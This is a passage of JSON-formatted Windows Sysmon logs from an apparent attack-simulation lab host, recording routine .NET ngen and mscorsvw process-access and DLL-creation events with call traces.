C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:27.667","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0483-5F25-0000-001011370D00}","TargetProcessId":"3460","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6761,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:27.667\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0483-5F25-0000-001011370D00}\r\nTargetProcessId: 3460\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:27.667","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0483-5F25-0000-001011370D00}","TargetProcessId":"3460","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6762,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:27.667\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0483-5F25-0000-001011370D00}\r\nTargetProcessId: 3460\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:27.667","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0483-5F25-0000-001011370D00}","TargetProcessId":"3460","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6763,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:27.699\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0483-5F25-0000-0010473A0D00}\r\nTargetProcessId: 3372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:27.699","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0483-5F25-0000-0010473A0D00}","TargetProcessId":"3372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6764,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:27.699\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0483-5F25-0000-0010473A0D00}\r\nTargetProcessId: 3372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:27.699","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0483-5F25-0000-0010473A0D00}","TargetProcessId":"3372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6765,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:27.714\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0483-5F25-0000-0010473A0D00}\r\nTargetProcessId: 3372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:27.714","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0483-5F25-0000-0010473A0D00}","TargetProcessId":"3372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6766,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:28.011\r\nProcessGuid: {A837DB8D-0483-5F25-0000-0010473A0D00}\r\nProcessId: 3372\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d2c-0\\Microsoft.Build.Framework.dll\r\nCreationUtcTime: 2020-08-01 05:58:28.011","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:28.011","ProcessGuid":"{A837DB8D-0483-5F25-0000-0010473A0D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d2c-0\\Microsoft.Build.Framework.dll","CreationUtcTime":"2020-08-01 05:58:28.011","EventReceivedTime":"2020-08-01 05:58:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6767,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:28.042\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0484-5F25-0000-0010AE3D0D00}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:28.042","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0484-5F25-0000-0010AE3D0D00}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6768,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:28.042\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0484-5F25-0000-0010AE3D0D00}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:28.042","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0484-5F25-0000-0010AE3D0D00}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
